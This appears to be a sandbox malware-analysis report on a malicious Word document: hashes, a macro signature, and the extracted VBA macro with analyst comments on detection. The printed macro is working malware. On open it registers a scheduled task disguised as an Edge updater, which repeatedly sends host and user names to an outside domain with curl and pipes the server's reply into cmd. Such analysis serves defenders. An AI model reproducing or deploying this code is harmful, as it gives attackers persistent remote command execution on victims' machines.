Behavioral task
behavioral1
Sample
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc
Resource
win10v2004-20240508-en
General
-
Target
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae
-
Size
429KB
-
MD5
2add40a089dad67f2edb6177cd294b88
-
SHA1
b4fd0de1f29a8d069eb77ab7941d4de925a4c5b7
-
SHA256
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae
-
SHA512
b7dadc5c45741ef4f6b63eee1ed62c088c3064dd78ea0d5149760e98e17416416d9b3f3b39c8eade34d43e1aecdb76f7d2c84c8d4e43a564e77e53d5ad27ec09
-
SSDEEP
12288:9tY2RRrgcpOeAvY+cX98Z11oOH0PNiUBpvdh:9tYeg1eJLX7EUBpvT
Malware Config
Signatures
-
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule sample office_macro_on_action -
resource sample
Files
-
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc windows office2003
ThisDocument
' Analyst annotation of the extracted ThisDocument module. The listing's display line
' numbers are dropped and line breaks restored; statements and string literals are unchanged.
' Behaviour summary: on open, the document registers a repeating scheduled task whose action
' downloads a file with curl and pipes its contents into cmd, then runs a decoy routine.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{09FD2EFF-5669-11D3-B65F-00C04F8EF32D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Auto-run entry point: Word calls Document_Open when the document is opened with macros
' enabled. This is the "macro on action" behaviour the report's signature flags.
Private Sub Document_Open()
    ' Task Scheduler 2.0 COM interface. Persistence is set up through COM, so the Office
    ' process does not spawn schtasks.exe; command-line monitoring for schtasks alone would
    ' miss it. Task-registration telemetry (Security 4698, TaskScheduler/Operational 106)
    ' is the more reliable hunting source.
    Set objTaskService = CreateObject("Schedule.Service")
    objTaskService.Connect
    ' "\" is the root task folder, so the task is not placed under a vendor subfolder.
    Set objRootFolder = objTaskService.GetFolder("\")
    ' NewTask takes a reserved flags argument that must be 0.
    Set objTaskDefinition = objTaskService.NewTask(0)
    ' Trigger type 1 = TASK_TRIGGER_TIME.
    Set objTrigger = objTaskDefinition.Triggers.Create(1)
    ' Fixed start timestamp with an ISO 8601 repetition interval of 18 minutes, so the
    ' action re-runs periodically rather than once.
    objTrigger.StartBoundary = "2023-01-01T00:00:00"
    objTrigger.Repetition.Interval = "PT18M"
    objTrigger.Enabled = True
    ' Action type 0 = TASK_ACTION_EXEC (run a program).
    Set objAction = objTaskDefinition.Actions.Create(0)
    ' conhost.exe is used as the launcher for cmd; "--headless" is commonly seen where the
    ' child console should have no visible window. conhost.exe started with --headless and
    ' a cmd child is a useful process-tree detection.
    objAction.Path = "conhost.exe"
    ' The command line does two things:
    '   1. curl writes the server response to C:\ProgramData\mki.rr. cmd expands
    '      %computername% and %username%, so the host and user names are sent to the
    '      server in the "vc" query parameter on every run.
    '   2. "more <file>|cmd" feeds the downloaded file into cmd's stdin, so whatever the
    '      server returns is executed as shell commands. The commands can differ per run
    '      and are not visible in the document itself.
    ' IoCs on this line: the file path, the domain and URL path, and the curl / more|cmd chain.
    objAction.Arguments = "--headless cmd /c ""curl -o C:\ProgramData\mki.rr https://mariasunistyle.com/ysc.php?vc=%computername%SS%username% & more C:\ProgramData\mki.rr|cmd"""
    ' Task name imitates a Microsoft Edge updater. Flags 6 = TASK_CREATE_OR_UPDATE
    ' (an existing task of the same name is overwritten); logon type 3 =
    ' TASK_LOGON_INTERACTIVE_TOKEN (runs as the logged-on user, no stored credentials and
    ' no elevation requested here).
    objRootFolder.RegisterTaskDefinition "MicrosoftEdgeEssentialUpdates", objTaskDefinition, 6, , , 3
    ' Decoy / cleanup routine runs only after the task has been registered.
    ClearDocumentContent
End Sub

' Decoy routine. Despite living in a Word document it drives Publisher, not Word:
' NOTE(review): this looks like repurposed boilerplate; the original comments below are the
' author's and do not all match the code (nothing is saved or closed).
Sub ClearDocumentContent()
    Dim pubApp As Object
    Dim pubDoc As Object
    Dim shape As Object

    ' Initialize Publisher application
    ' Errors are suppressed so a missing running instance does not stop the macro;
    ' GetObject attaches to a running Publisher, otherwise CreateObject starts one.
    On Error Resume Next
    Set pubApp = GetObject(, "Publisher.Application")
    If pubApp Is Nothing Then
        Set pubApp = CreateObject("Publisher.Application")
        pubApp.Visible = True ' Set to True if you want to see the Publisher window
    End If
    On Error GoTo 0

    ' Check if a document is open
    ' Error handling is back on here: if Publisher is not installed, pubApp is still
    ' Nothing and this line raises a runtime error. The scheduled task already exists
    ' by then, so the failure does not undo the persistence.
    If pubApp.Documents.Count > 0 Then
        Set pubDoc = pubApp.ActiveDocument

        ' Loop through each shape in the document and delete it
        For Each shape In pubDoc.Pages(1).Shapes
            shape.Delete
        Next shape
        ' Lure message shown to the user; it is only reached when a Publisher document
        ' is open.
        MsgBox "Unsupported Version of Microsoft Office", vbInformation
        ' Save and close the Publisher document
    End If

    ' Clean up
    Set pubDoc = Nothing
    Set pubApp = Nothing
End Sub